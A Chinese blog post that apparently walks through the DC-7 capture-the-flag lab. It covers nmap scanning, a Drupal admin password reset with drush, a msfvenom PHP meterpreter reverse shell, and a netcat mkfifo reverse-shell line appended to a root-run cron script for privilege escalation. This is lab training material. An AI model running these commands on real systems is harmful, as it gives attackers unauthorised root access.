这周开始上课了,没法每日更新了,只能周末抽时间发,,,

那么进入正题

老规矩先搜索主机的地址

arp-scan -l

用nmap扫描端口和信息

nmap -sS -A -p 1-65535 192.168.75.140

开启了80端口,访问一下看看

emmm,为啥这么熟悉,。,。

使用之前的方法攻击Drupal,用msf测试失败。。。。

总觉得哪里和原先的不一样


????

挂上SSR去谷歌搜一波看看

!!!

配置文件?账号密码?

能不能登录后台?

SSH呢,奇怪的操作增加了

WTF

奇怪的操作果然增加了

查看当前目录下的文件,backups里面有两个加密文件,不可利用,查看mbox文件,发现是一个计划任务:自动备份数据库的执行情况,调用的脚本是/opt/scripts/backups.sh,是root权限执行的。

看看权限和内容

drush和gpg是什么东西?

其中drush是专门用来管理Drupal站点的shell,可以用来修改密码

可以修改admin账号的密码,这里要进入/var/www/html目录下才有权限执行该命令,这里修改密码为123465,提示success即修改密码成功。

登录成功

在Content中新建一个Basic page,然后在Title输入页面的名称,在Body中放入反弹shell的PHP代码,Text format的位置选择PHP code。但是从下图中可以看到Text format里面没有PHP code选项。这些都弄好了之后,在kali上监听端口,最后点击Preview按钮。

不过这个貌似被移除了

可以通过手动安装。选择URL并点击install

URL:https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

随后在Content中添加webshell.php,点击Content > Add content > Basic page,先将Text format修改为PHP code,再写入反弹shell

可以直接msfvenom生成一个反弹shell代码

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.75.129 LPORT=4444 R > DC7_shell.php

复制反弹shell代码到Body里,Title自定义,完了之后放着别动,先使用metasploit监听端口,然后点击Preview

msfconsole
use exploit/multi/handler
set lhost 192.168.75.129
set lport 4444
set payload php/meterpreter/reverse_tcp
run

点击Preview后反弹成功,接着进入交互shell

shell
python -c "import pty;pty.spawn('/bin/bash')"

我们使用Drupal反弹回来的shell用户是www-data,所以接下来就是将反弹shell的代码附加到backups.sh脚本中(因为计划任务是root权限执行的,反弹回来的shell也会是root用户)

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.75.129 1234 >/tmp/f" >> backups.sh

然后在kali中监听相应端口,等待计划任务的执行,执行后便获得rootshell,接着进入交互shell

nc -lvnp 1234
shell
python -c "import pty;pty.spawn('/bin/bash')"

拿下flag


天渊应龙圣神大帝-道锋潜鳞

天渊应龙圣神大帝-道锋潜鳞

一人自负一阴阳,混沌分开气升降。炼阴仙客解冲虚,凡骨尤能化百族。雷域龙神启太元,天清升仙出浩渊。

0 条评论

发表评论

电子邮件地址不会被公开。 必填项已用*标注